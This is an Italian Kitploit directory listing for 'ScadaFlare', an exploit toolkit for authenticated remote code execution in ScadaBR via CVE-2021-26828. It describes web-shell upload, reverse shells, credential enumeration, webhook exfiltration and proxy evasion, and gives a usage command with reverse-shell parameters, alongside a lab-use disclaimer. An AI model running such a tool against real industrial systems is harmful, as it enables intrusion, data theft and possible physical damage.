Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Framework di exploit RCE autenticata per ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Strumenti/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Generazione di PayloadAnalisi delle VulnerabilitàExploitSicurezza SCADA/ICSSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare Framework di exploit RCE autenticata per ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

58 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

ScadaFlare - Toolkit di sfruttamento RCE autenticato CVE-2021-26828

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Un exploit RCE modulare post-autenticazione che prende di mira ScadaBR <1.1.0, potenziato per le operazioni red team.

ScadaFlare Demo

Funzionalità

  • Carica shell .jsp armate tramite view_edit.shtm
  • Supporta payload Linux e Windows
  • Supporto proxy SOCKS5 / HTTP
  • Trigger di reverse shell (standard o base64)
  • Moduli di enumerazione (DB, credenziali, Log4Shell, ecc.)
  • Esfiltrazione via webhook (Slack / Discord)
  • Generazione di script resource Metasploit
  • Supporto alla pulizia (kill switch)

Mappatura delle tecniche MITRE ATT&CK

CVE

  • CVE-2021-26828
  • Scoperta da Fellipe Oliveira
  • Exploit migliorato e reso modulare

Perché esiste

Questo exploit è stato sviluppato durante l'analisi dello scenario HTB Pro Lab: Alchemy. Il PoC originale di Fellipe Oliveira era solido, ma:

  • Scritto in Python 2
  • Privo di funzionalità moderne come supporto proxy, pulizia della shell e concatenamento dell'enumerazione
  • Difficile da estendere o integrare nei flussi di lavoro red team

Questa versione, ScadaFlare, è una riscrittura completa in Python 3 con supporto modulare, molteplici strategie di evasione, override del rilevamento del sistema operativo, integrazione webhook, supporto proxy SOCKS e catene di enumerazione per l'uso operativo nel mondo reale.

Utilizzo

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

Solo uso legale ed etico

ScadaFlare è progettato esclusivamente per:

  • Formazione sull'hacking etico
  • Test in laboratorio SCADA
  • Ricerca difensiva e validazione delle vulnerabilità

L'uso non autorizzato contro sistemi industriali reali può:

  • Interrompere processi fisici
  • Causare danni o pericoli per la sicurezza
  • Comportare gravi conseguenze legali

Utilizzando questo strumento accetti la piena responsabilità di:

  • Ottenere un'autorizzazione scritta esplicita
  • Operare solo in ambienti approvati

Licenza

Licenza MIT – consulta LICENSE

Scarica lo strumento
FaseTecnicaID
Accesso iniziale (post-autenticazione)Account validiT1078
EsecuzioneSfruttamento di applicazioni esposte al pubblicoT1190
Esecuzione di comandiWeb shellT1505.003
Azioni privilegiateModifica di contenuti webT1505
Accesso alle credenzialiCredenziali nei file di configurazioneT1552.001
ScopertaScoperta di sistemi remotiT1018
EsfiltrazioneEsfiltrazione tramite servizio webT1567.002
Evasione della difesaTunneling di proxy e protocolloT1090